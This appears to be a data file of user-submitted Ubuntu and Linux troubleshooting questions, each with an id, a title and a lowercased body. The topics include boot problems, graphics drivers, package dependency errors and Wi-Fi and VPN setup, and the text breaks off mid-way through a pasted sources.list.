496703	bootable usb not working for me	i currently have an hp computer that is only a few months old . the computer recently started running super slow and i was going to change from windows 7 to ubuntu as i know that windows has way more viruses available than ubuntu . i used the pendrivelinux software to change the iso to usb and it said complete . i then took the usb , plugged it into my computer and at the screen that pops up before the windows logo i pressed f12 . the only thing i could choose was windows 7 .
496708	how to make a dvd which can be played in a dvd player	is there any application in which is programmed to make dvds which can be played in a dvd player i recently saw a dvd in which all the videos were present in .vob format so do i need any extra plugins to convert it into mp4 format and are mp4 formats complatible with dvd players if any one thinks this question does'nt suits this site then i recommend them to migrate this question to that site
496709	sound blaster live ! ct4850 does n't work , driver installation ?	well , my sound blaster live ! card does n't work in ubuntu , even though it 's recognized under the sound settings . i tested each of the options , ( it 's just selections between digital and analog w or w/o amplifers , ) and none of them worked . i went looking for a new driver and found this . it supports my card 's chipset , so i downloaded it , extracted it , and it gave me a .freebsd file . could someone walk me through what to do with it ? it would be very much appreciated .
496710	how to direct php version to php in lampp to set default ?	i 'm just newbie in ubuntu i have install php before install lamp , when i type `` which php '' == > /usr/bin/php not to direct in directory php in lamp because php in lampp have enable mcrypt ... but php in default now does n't active mcrypt..how to set php in lampp to default ? i have tried to input `` alias php='/opt/lampp/php ' '' in .bash_profile and .bashrc , but it 's still not work , , but when i type `` php -v `` == > bash : /opt/lampp/php : is a directory how can i fix it ? thx
496711	run update-grub now ca n't boot ubuntu , windows , or cd	i have a dual boot windows vista and ubuntu 11.04 desktop . i wanted the default os to be the last one that i booted so i edited the grub file in /etc/default/grub . i changed the line grub_default=0 to grub_default=saved . then i run update-grub . i rebooted the machine and now it does n't display anything . grub menu does n't display . bios does n't display . ca n't boot from a cd . any ideas on how to recover from this fiasco ?
496712	wine program not running in fullscreen	so i 'm fairly new to wine , and i 'm having a problem with a few programs that do n't want to run in fullscreen . the menu bar remains , the mouse does n't move all the way to the left and the gray bar at the top of the screen remains as well . screen shot also , the screen will scroll . is there any way to remedy this ? i 'm using wine 1.6.2 , and ubuntu 14.04
496713	msi radeon r9 270 graphics drivers	how am i supposed to download these drivers and utilities ? i am a complete newb to linux , any help will be greatly appreciated ! note : the drivers and utilities are windows based
496714	upgrading from 13.10 to 14.04	when i search how to upgrade my os from ubuntu 13.10 to 14.04 lts , i see posts stating to enter the terminal and type : sudo apt-get update & & sudo apt-get dist-upgrade i have also seen suggestions to use software updater and select the upgrade option . do these two methods serve different functions or are they the same thing ? if they are the same thing , if i use the command-line method , will using the gui method cause issues ?
496716	mma9 pythonika compiling error on ubuntu 14.04	i am intalling pythonika on ubuntu 14.04 . i downloaded the files of pythonika from the following url . https : //github.com/szhorvat/pythonika i was able to compile pythonika on ubuntu 12.04 using makefile.linux . however i got the following error after ubuntu 14.04 upgrade . any help will be appreciated . regrads , yoshihiro sato my system is ubuntu 14.04 64bit and mathematica 9.0 for linux x86 ( 64-bit ) ( february 18 , 2013 ) . $ python -- version python 2.7.7 : : anaconda 2.0.1 ( 64-bit ) $ which python /home/satouy/anaconda/bin/python $ make -f makefile.linux cc -i/usr/local/wolfram/mathematica/9.0/systemfiles/links/mathlink/developerkit/linux-x86- 64/compileradditions -i/usr/include/python2.7/ pythonika.o pythonikatm.o - l/usr/local/wolfram/mathematica/9.0/systemfiles/links/mathlink/developerkit/linux-x86- 64/compileradditions /usr/local/wolfram/mathematica/9.0/systemfiles/links/mathlink/developerkit/linux-x86- 64/compileradditions/libml64i3.a -lstdc++ -lrt -lpython2.7 -o pythonika /usr/bin/ld : /usr/local/wolfram/mathematica/9.0/systemfiles/links/mathlink/developerkit/ linux-x86-64/compileradditions/libml64i3.a ( mlnumenv.c.o ) : undefined reference to symbol 'fmod @ @ glibc_2.2.5 ' /lib/x86_64-linux-gnu/libm.so.6 : error adding symbols : dso missing from command line collect2 : error : ld returned 1 exit status make : *** [ pythonika ] error 1 i used the following makefile.linux . $ cat makefile.linux # set the paths according to your mathlink developer kit location . # ( the paths should not contain whitespaces ) mathematica_install_dir = /usr/local/wolfram/mathematica/9.0 mlinkdir = $ { mathematica_install_dir } /systemfiles/links/mathlink/developerkit # # sys = linux sys = linux-x86-64 caddsdir = $ { mlinkdir } / $ { sys } /compileradditions incdir = $ { caddsdir } libdir = $ { caddsdir } mprep = `` $ { caddsdir } /mprep '' mcc = `` $ { caddsdir } /mcc '' # modify the following for python versions other than 2.6 python_version_major = 2 # # python_version_minor = 6 python_version_minor = 7 # path to the python includes ( modify according to python version ) # pythoninc = /usr/include/python $ { python_version_major } . $ { python_version_minor } / pythonika = pythonika includes = -i $ { incdir } -i $ { pythoninc } # libstdc++ and librt are , apparently , needed for correct compilation under linux # with libmli3 statically linked # # # libs = -l $ { libdir } $ { libdir } /libml32i3.a -lstdc++ -lrt - lpython $ { python_version_major } . $ { python_version_minor } # # 64-bit system libs = -l $ { libdir } $ { libdir } /libml64i3.a -lstdc++ -lrt - lpython $ { python_version_major } . $ { python_version_minor } all : pythonika pythonika : $ { pythonika } .o $ { pythonika } tm.o $ { cc } $ { includes } $ { pythonika } .o $ { pythonika } tm.o $ { libs } -o $ { pythonika } $ { pythonika } tm.o : $ { pythonika } .tm $ { mprep } $ { pythonika } .tm -o $ { pythonika } tm.c $ { cc } -c $ { pythonika } tm.c $ { includes } $ { pythonika } .o : $ { pythonika } .c $ { cc } -c $ { pythonika } .c $ { includes } clean : rm -f $ { pythonika } tm . * $ { pythonika } .o $ { pythonika } after changing my python environment , i tried to compile it . i have almost same error message . would you please show me how to resolve this problem ? $ python -- version python 2.7.6 $ which python /usr/bin/python $ make -f makefile.linux cc -i/usr/local/wolfram/mathematica/9.0/systemfiles/links/mathlink/developerkit/linux-x86- 64/compileradditions -i/usr/include/python2.7/ pythonika.o pythonikatm.o -l/usr/local/wolfram/mathematica/9.0/systemfiles/links/mathlink/developerkit/linux-x86-64/compileradditions /usr/local/wolfram/mathematica/9.0/systemfiles/links/mathlink/developerkit/linux-x86-64/compileradditions/libml64i3.a -lstdc++ -lrt -lpython2.7 -o pythonika /usr/bin/ld : /usr/local/wolfram/mathematica/9.0/systemfiles/links/mathlink/developerkit/ linux-x86-64/compileradditions/libml64i3.a ( mlnumenv.c.o ) : undefined reference to symbol 'fmod @ @ glibc_2.2.5 ' //lib/x86_64-linux-gnu/libm.so.6 : error adding symbols : dso missing from command line collect2 : error : ld returned 1 exit status make : *** [ pythonika ] error 1
496720	ubuntu 14.04 running very slow after upgrade 32 bit to 64 bit	i just upgraded my ubuntu 14.04 32 bit to 64 bit . i find right after i boot it the first time that the machine is running really slow , even slower than when i had the 32 bit version . i find that when i run top command , the compiz process is occupying 90 % of the cpu . i tried to resolve that somehow , but no success yet . i also saw a message from the system saying that 3d at this time is being done in software and x is not using hardware acceleration to achieve it . i want to ask if someone else also faced this issue , and how could i bring my machine up to speed . i have i7 processor with 16 gb of ram .
496724	discreate gpu ( 7670m ) not being detected ubuntu 14.04 , hp laptop with dual graphics ( 7640g + 7670m )	i have hp laptop ( 2005ax ) with amd a8 processor and dual gpu 7640g + 7670m i 'm running ubuntu 14.04 with amd proprietary drivers installed . i 'm not able to select discrete gpu , hence not being able to use full potential of my hardware on ubuntu not able to use discrete gpu 7670m in ubuntu 14.04 . machine info dave @ dave-hp-pavilion-g6-notebook-pc : ~ $ uname -a linux dave-hp-pavilion-g6-notebook-pc 3.13.0-30-generic # 55-ubuntu smp fri jul 4 21:40:53 utc 2014 x86_64 x86_64 x86_64 gnu/linux dave @ dave-hp-pavilion-g6-notebook-pc : ~ $ lspci | grep vga 00:01.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] trinity [ radeon hd 7640g ] 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7500m/7600m series ] dave @ dave-hp-pavilion-g6-notebook-pc : ~ $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7640g opengl version string : 4.4.12967 compatibility profile context 14.20 upon running aticonfig -- initial i get this new xorg section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` default card 0 '' busid `` pci:0 @ 0:1:0 '' endsection section `` device '' identifier `` default card 1 '' busid `` pci:1 @ 0:0:0 '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:0:1:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsectionn but this xorg.conf resets itself after restart section `` device '' identifier `` default card 0 '' busid `` pci:0 @ 0:1:0 '' endsection section `` device '' identifier `` default card 1 '' busid `` pci:1 @ 0:0:0 '' endsection i have tried these commands to select the gpu sudo amdconfig -- px-dgpu # activate discrete gpu ( high-performance mode ) , must re-start x to take effect sudo amdconfig -- px-igpu # activate integrated gpu ( power-saving mode ) , must re-start x to take effect but i unable to use my discrete gpu ( 7670m ) has it is not activated root @ dave-hp-pavilion-g6-notebook-pc : ~ # amdconfig -- pxl powerxpress : discrete gpu is active ( high-performance mode ) . root @ dave-hp-pavilion-g6-notebook-pc : ~ # fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7640g opengl version string : 4.4.12967 compatibility profile context 14.20 ubuntu 14.04 is not detecting 7670m and only 7640g is working . anyone please help .
496726	delete sources after installing driver	i recently installed lubuntu in my asus laptop , as the sound was dead , i installed the realtek official drivers . my mistake ( i think ) was that i installed the drivers from the `` downloads '' folder with the traditional flow : ./configure - > make - > make install now im afraid that if i delete that folder sound will stop working again . is it safe to delete this folder ( i do n't want it to live on the downloads folder ) what would be the constituencies ?
496729	error : - one or more models did not validate	i am new to django . i got an error ( shown below ) when apply syncdb . my model is class abstractaddress ( models.model ) : address1=models.charfield ( max_length=200 ) email = models.emailfield ( null=true ) class meta : abstract=true class bmusermanager ( baseusermanager ) : def create_user ( self , useremail , display_name , password=none ) : if not usermemail : raise valueerror ( `` user must have a email '' ) user = self.model ( useremail=bmusermanager.normalize_email ( useremail ) ) user.display_name = display_name user.email = useremail user.set_password ( password ) user.status='a' user.save ( using=self._db ) return user def create_superuser ( self , useremail , display_name , password ) : user = self.create_user ( useremail=useremail , display_name=display_name , password=password ) user.email = useremail user.display_name = display_name user.is_superuser = true user.is_staff = true user.status='a' user.save ( using=self._db ) return user class bmuser ( abstractbaseuser , permissionsmixin , abstractaddress ) : display_name = models.charfield ( max_length=25 ) useremail = models.emailfield ( unique=true ) status = models.charfield ( max_length=1 , default='a ' ) username_field = 'useremail' required_fields = [ 'display_name ' ] objects = bmusermanager ( ) def __unicode__ ( self ) : return self.display_name def user ( self ) : return self error message : commanderror : one or more models did not validate : admin.logentry : 'user ' has a relation with model usermgmt.bmuser , which has either not been installed or is abstract . auth.user : model has been swapped out for 'usermgmt.bmuser ' which has not been installed or is abstract .
496730	wallpaper is not seen in fullscreen	the wallpaper does not cover the screen fully . there are black background in the top as well as in the bottom , wallpaper is only in the center . all other windows opens normally apart from the wallpaper . see screenshot below : how to rectify this problem ?
496733	does itunes work ( well ) on ubuntu ?	is there an alternative to itunes where i can buy music/back up phone ?
496734	how can i reinstall ubuntu 12.04 in partition disk ?	i have succes to install ubuntu 12.04 in partition disk ( with swap area , http : //www.linuxbsdos.com/2012/05/17/how-to-dual-boot-ubuntu-12-04-and-windows-7/ ) everything it 's ok until i execute sript in terminal so make my localhost not work normally , maybe i have change setting or anything , sow i thing i need to reinstall ubuntu 12.04 , how can i reinstall my ubuntu ? thx
496738	external file changes sync may be slow	i 'm an ubuntu 13.10 user and installed android-studio-bundle-135.1245622-linux.tgz but when run it using terminal command : ./studio.sh , it opens but below error appears : external file changes sync may be slow native file watcher is not executable : /home/tahtawy/desktop/android-studio/bin/fsnotifier64 and i ca n't open it throw lancher so , how can i solve this problem .
496740	is it possibly to install ubuntu without making partitions ?	i 'd like to make dual-boot ( windows 8 + ubuntu ) for my pc , which has a second hdd . is it possible to simply install ubuntu on the second one ( which is empty ) without making any shrinks/partitions ? and is it possible to make ubuntu use only the second disk without even touching first one ( possessed by windows ) ?
496745	problem in skype	i use skype on my computer and when i try to call my friend so we can coop on minecraft i have the problem of not being able to hear him and he is unable to hear me . i am using the skype that is from canonical partners . i am using ubuntu 14.04 .
496748	youtube not playing	i am using ubuntu 13.10 . my youtube is n't playing since three days . i upgraded the system . re-installed ubuntu restricted extras package . still not working . it 's not working with any browser ... i tried firefox , chrome .
496749	best practice for mounting/unmounting loopback devices on a network share ?	i am looking for a preferred way to automatically mount and unmount disk images ( i.e. , loopback files ) on a network drive . unfortunately /etc/init.d/umountnfs does not check for loopback devices . consequently , the shutdown sequence gets stuck when trying to unmount the network drive hosting the loopback file . on the other hand , how can i ensure that the loopback file is available on system startup , i.e. , how to influence the sequence of file system mounting during boot ?
496750	sound lost in chrome ( and only chrome )	i suddenly lost sound in ubuntu chrome ( no more youtube , or spotify , or soundcloud sound or any other in chrome ) . all other apps such as firefox or vlc work fine . there are a bunch of nice tips at this askubuntu entry , but none of them work , and i did not lost sound after an update , so it does not seem related to the ubuntu or chrome , or flash version . any clue ?
496751	ubuntu 14.04 installer does n't detect my partitions	i 'm running win7 64-bit and i 'm trying to dual-boot ubuntu 14.04 . however , when i go into the ubuntu installer , it does n't display any of my partitions . i would like to mention that this is my second installation of win7 on my laptop . after reading a bunch of forums , it seems like this is a very common problem and it is very likely that it is due to a damaged partition table . is there any way to fix my partition table from windows ? i tried booting into ubuntu live but for some reason my laptop 's keyboard does n't work at all ( so i ca n't use the terminal ) and the mouse & touchpad only work for a short period of time , then stop working . all the solutions i 've seen so far involved running fixparts from ubuntu live ( which is something i ca n't do , given the circumstances ) . i ran fixparts from windows on my 0 : drive , pressed `` p '' , and got this : http : //gyazo.com/434a6a26aef9a346aa59d0154a004fc1 i then pressed `` w '' , as instructed in the tutorial , and the cmd closed immediately . i am unsure whether it did anything or not , but as it was closing i managed to catch a glimpse of the word `` successfully '' , so i 'm hoping something happened . unfortunately , this did n't solve the problem and the ubuntu installer still does n't detect my partitions . i would appreciate any answers or indications as to what i might do to fix this . oh , i would like to mention that i had this setup ( win7 dual-boot ubuntu ) before my win7 re-installation , but grub did n't show up when i booted my new win7 ( windows bootloader must have deleted it ) so i assumed my ubuntu partition was lost . cheers ! update : i just downloaded gdisk and ran it , showed up with : http : //gyazo.com/bbfe70522408a9d5e6530f094115d9ec i think this is a pretty clear indication that my partition table is damaged . any ideas on how to fix it from windows ?
496755	eclipse not using path	i am facing an issue of eclipse not picking up the vm from the path environment variable . i follow the below steps to reproduce the error : downloaded the appropriate version of oracle 's jdk from http : //www.oracle.com/technetwork/java/javase/downloads/index.html ? sssourcesiteid=otnjp extracted it : tar zxvf ~/downloads/jdk-8u5-linux-x64.tar.gz ~/dev added to path : gedit ~/.bashrc export java_home=/home/faizal/dev/jdk1.8.0_05 export path= $ { path } : $ { java_home } /bin confirmed java is available in path by restarting system and executing java in random folder in bash : cd ~ java but when i run eclipse , i get the error : a java runtime environment ( jre ) or java development kit ( jdk ) must be available in order to run eclipse . no java virtual machine was found after searching the following locations : /home/faizal/dev/eclipse-luna/eclipse/jre/bin/java java in your current path i can make it work only by creating a symbolic link java in /bin to point to $ java_home/bin/java . why is eclipse not working without this symbolic link ?
496757	lost password , problems with downloading anything except simple thingls like word documents , prsentations and pictures	i lost my password for my ubuntu account . i recently moved here from xp and have no idea what to do . i 'm an youtuber and need a recording software.the account with my password was the administrator account . the other account i can not download anything . i can not open software manager .
496758	not getting option to install next to windows during installation process	i have windows 8 installed on a new computer and want ubuntu 14 installed next to it . i used unetbootin to make a ubuntu usb stick and rebooted from that . during the installation process however i do n't get the option to install ubuntu alongside windows like i used to . i 've done this several times before and know that option is usually there even when no partition is prepared for ubuntu . what could be the reason for the installer not showing this ? p.s . i installed windows myself on this pc and know there is only 1 primary partition and no hidden ones or anything . p.p.s . windows 8 is installed through uefi , and as i 've read this might be the problem ?
496760	ca n't connect to wifi adhoc network created in windows 7 from ubuntu 14.04	i have two laptops . one is running on windows 7 and connected to internet though wire and other is running on ubuntu 14.04 . i have created a wifi adhoc network in windows 7 machine and shared the internet connection.. from any other windows machine i can connect to the wifi and connect to internet but when i am trying to connect through the ubuntu machine after it takes few moments and gets failed to connect.. please help me.. this the output of some commands dmesg [ 14804.471075 ] wlan0 : selected ibss bssid f6:39:0c:35:16:74 based on configured ssid [ 14804.494144 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : qos enabled : true ( implement ) [ 14804.494253 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : beacon enabled : true [ 14804.494266 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : ibss joined : true ( implement ) [ 14804.494337 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 14822.498047 ] wlan0 : no active ibss stas - trying to scan for other ibss networks with same ssid ( merge ) [ 14822.498086 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : beacon enabled : false [ 14823.114160 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : beacon enabled : true [ 14850.120618 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : beacon enabled : false [ 14850.120635 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : ibss joined : false ( implement ) [ 14850.320247 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : qos enabled : false ( implement ) [ 14850.320260 ] brcmsmac bcma0:0 : brcms_ops_config : change power-save mode : false ( implement ) [ 14850.320406 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 12:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) 13:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 )
496761	ca n't switch to discrete gpu hybrid graphics ati/intel	just recently i had got my hybrid graphics working with dri_prime=1 . i obviously have the open source drivers . now for some reason that i ca n't figure out it has stopped working . xrandr -- listproviders only shows my intel card now as before it showed my radeon twice . cat /sys/kernel/debug/vgaswitcheroo/switch shows this : 0 : igd : + : pwr:0000:00:02.0 1 : dis : : dynoff:0000:01:00.0 i know dynoff means that the driver has turned it off automaticly and is a feature for my kernal 3.13.7 ( i upgraded it to 3.15.2 to try and fix the issue ) . the question i have is , how do i turn it back on ? extra info : dri_prime=1 glxinfo |grep renderer shows : glx_mesa_multithread_makecurrent , glx_mesa_query_renderer , glx_mesa_multithread_makecurrent , glx_mesa_query_renderer , opengl renderer string : mesa dri intel ( r ) sandybridge mobile gpu : ati radeon hd6700/ intel hd3000 thanks , aaron
496774	unable to play fifa videos , starsports videos on firefox 30 ( ubuntu 14.04 64 bit )	i am using ff 30 on ubuntu 14.04 . i installed flash and youtube is working fine . however some videos from some sites are n't playing - foot ball videos ( fifa ) and cricket videos ( starsports ) etc . just black screen appears . same videos are working fine on google chrome some links which i could n't play on firefox http : //www.fifa.com/worldcup/videos/highlights/match=300186474/index.html http : //www.starsports.com/cricket/tour/tourid=130/matchvideos/vod/videoid=1340276/index.html
496776	how to build vsftpd ?	i have just downloaded the vsftpd-3.0.2 distribution and opened to find lots and lots of intimidating files . i read the install file and got myself even more confused ! ! ! so can anyone out there give me simple & easily understandable instructions to build vsftpd preferably from terminal ? ? i 'm using xubuntu 14.04 any help greatly appreciated .
496778	how can i repair unity from terminal while on a wifi that requires me to login through a web browser ?	i was trying to reinstall unity-lens-applications but could n't remember the name . i typed unity- and pressed tab to see the options . instead of using the down key i just held enter to scroll through the results and that ended up with me attempting to install unity-* . i quickly regretted this and killed the process but now it fails to load after rebooting . normally i would log in with ctrl+alt+f1 and reinstall unity from terminal but i am staying a hotel that requires me to sign in to the wifi so i ca n't download unity again . for the time being i 've booted into an ubuntu install usb , but i 'm wondering how i can repair unity on my normal installation from here .
496780	ntfs file system never clean in disk utility , while ext4 and fat are , ubuntu 12.04	i have the lg 47ln5708 tv which supports only the fat and ntfs file systems . i want to playback a movie file of 4.7 gb using the usb port of the tv , so i ca n't use the fat file system , since it 'only ' goes up to 4 gb . formatting a usb stick or hard drive to ntfs with disk utility in ubuntu 12.04 however , always results in the error file system is not clean when clicking check filesystem . formatting to ntfs with gparted still gives the same error in disk utility . doing the same but with either ext4 or fat , i get the message that the file system is clean . how do i get a clean ntfs file system ?
496782	how to get information for fps for a video file in properties menu ? ( ubuntu 14.04 )	i want to find information on fps for video easily , can i display that in properties menu after right-clicking on file ? how to find it ?
496783	unable to run linux ubuntu 14.04 lts	i have problem when i try , install , or any execution ubuntu 14.04 lts 32-bit and 64-bit using cd and unetbootin on my 8gb usb and i ca n't find the solution on google or any source about this problem . when i start execution ubuntu ( example : try ubuntu ) , i have got error like this : my computer specifications are : hdd : 80gb ide and 80gb sata motherboard : asus p5vd2-mx se psu : 480w ram : ddr2 2gb processor : intel pentium e2140 1.6 ghz graphic card : nvidia geforce 7300 se/7200 gs i want to try ubuntu before installing it to this computer . anyone have a solution about this ?
496785	iptables : route all traffic from wlan over vpn	i do have a pc with one ethernet and one wifi connection and would like to route all traffic that comes through the wifi over a vpn . how can i do this with iptables ? so the setup is : internet/gateway -- - eth0 -- -- -- -- -- tun0 -- -- -- -wlan0 -- -- -other pcs 192.168.178.1 192.168.178.2 192.168.1.1 the vpn is established over port 1194 ( udp )
496787	files shown in terminal not show on desktop	i have an issue where i am creating .cap files with aircrack-ng and am saving them to the desktop , but i ca n't see them . when i use the ls command in the terminal they show up , but just not on the graphical desktop view . i want to be able to see them on the desktop and not just through the terminal . any help would be appreciated , thanks ! edit : turns out i am not saving them to the desktop , but rather the /home/user/ directory . the hidden files show up when i press ctr + h , but they do n't show up in the terminal ; the only file showing up in the terminal when i use the ls command is the desktop ( sorry for the topic edit ) . how can i get the hidden files to show up in the terminal as well ?
496788	`` you have held broken package '' while trying to install r	i know this question has already been asked , but all the answer posted were n't able to help solve my problem . i tried the following command on ubuntu 14.04 : sudo apt-get install r-base-core and i get : the following packages have unmet dependencies : r-base-core : depends : libtiff4 but it is not installable recommends : r-recommended but it is not going to be installed recommends : r-base-dev but it is not going to be installed recommends : r-doc-html but it is not going to be installed e : unable to correct problems , you have held broken packages . i have also tried it with aptitude : the following packages have unmet dependencies : r-base-core : depends : libtiff4 which is a virtual package . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) r-base-core [ not installed ] 2 ) r-base-dev [ not installed ] 3 ) r-cran-boot [ not installed ] 4 ) r-cran-class [ not installed ] 5 ) r-cran-cluster [ not installed ] 6 ) r-cran-codetools [ not installed ] 7 ) r-cran-foreign [ not installed ] 8 ) r-cran-kernsmooth [ not installed ] 9 ) r-cran-lattice [ not installed ] 10 ) r-cran-mass [ not installed ] 11 ) r-cran-matrix [ not installed ] 12 ) r-cran-mgcv [ not installed ] 13 ) r-cran-nlme [ not installed ] 14 ) r-cran-nnet [ not installed ] 15 ) r-cran-rpart [ not installed ] 16 ) r-cran-spatial [ not installed ] 17 ) r-cran-survival [ not installed ] 18 ) r-recommended [ not installed ] accept this solution ? [ y/n/q/ ? ] y no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . i then ran apt-get upgrade , update and other stuff described in this tutorial . here is the result of the command cat /etc/apt/sources.list : # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) ] / quantal main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty main restricted deb-src http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty-updates main restricted deb-src http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty universe deb-src http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty universe deb http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty-updates universe deb-src http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty multiverse deb-src http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty multiverse deb http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty-updates multiverse deb-src http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty-backports main restricted universe multiverse deb-src http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty-backports main restricted universe multiverse deb http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty-security main restricted deb-src http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty-security main restricted deb http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty-security universe deb-src http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty-security universe deb http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty-security multiverse deb-src http : //mirrors.ircam.fr/pub/ubuntu/archive/ trusty-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu quantal partner # deb-src http : //archive.canonical.com/ubuntu quantal partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu trusty main deb-src http : //extras.ubuntu.com/ubuntu trusty main deb http : //cran.rstudio.com/bin/linux/ubuntu precise/ and the result of the command cat /etc/apt/sources.list.d/* is : # deb http : //linux.dropbox.com/ubuntu precise main # disabled on upgrade to saucy # deb http : //linux.dropbox.com/ubuntu precise main # disabled on upgrade to saucy # deb http : //linux.dropbox.com/ubuntu precise main # disabled on upgrade to saucy # deb http : //ppa.launchpad.net/grumbel/ppa/ubuntu saucy main # disabled on upgrade to saucy deb-src http : //ppa.launchpad.net/grumbel/ppa/ubuntu raring main # deb http : //ppa.launchpad.net/grumbel/ppa/ubuntu saucy main # disabled on upgrade to saucy # deb-src http : //ppa.launchpad.net/grumbel/ppa/ubuntu raring main # deb http : //ppa.launchpad.net/grumbel/ppa/ubuntu saucy main # disabled on upgrade to saucy deb-src http : //ppa.launchpad.net/grumbel/ppa/ubuntu raring main # this file makes sure that opera browser is kept up-to-date # as part of regular system upgrades deb http : //deb.opera.com/opera/ stable non-free # opera browser ( final releases ) # the line above will make sure you get all final public releases . # uncomment the following line if you want to get alpha and beta # releases , too . # deb http : //deb.opera.com/opera-beta/ stable non-free # opera browser ( beta releases ) # this file makes sure that opera browser is kept up-to-date # as part of regular system upgrades deb http : //deb.opera.com/opera/ stable non-free # opera browser ( final releases ) # the line above will make sure you get all final public releases . # uncomment the following line if you want to get alpha and beta # releases , too . # deb http : //deb.opera.com/opera-beta/ stable non-free # opera browser ( beta releases ) # this file makes sure that opera browser is kept up-to-date # as part of regular system upgrades deb http : //deb.opera.com/opera/ stable non-free # opera browser ( final releases ) # the line above will make sure you get all final public releases . # uncomment the following line if you want to get alpha and beta # releases , too . # deb http : 